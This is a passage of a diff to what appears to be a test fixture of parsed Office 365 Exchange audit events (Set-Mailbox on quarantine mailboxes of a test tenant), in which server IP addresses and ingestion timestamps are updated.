bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853384900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6230,12 +6230,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6278,7 +6278,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6290,8 +6290,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177800200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853390700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6311,12 +6311,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6359,7 +6359,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6371,8 +6371,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177803200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853396500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6392,12 +6392,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6440,7 +6440,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6452,8 +6452,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177806100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853402300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6473,12 +6473,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6521,7 +6521,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6533,8 +6533,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177808800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853408Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6554,12 +6554,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6602,7 +6602,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6614,8 +6614,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177811800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853413700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 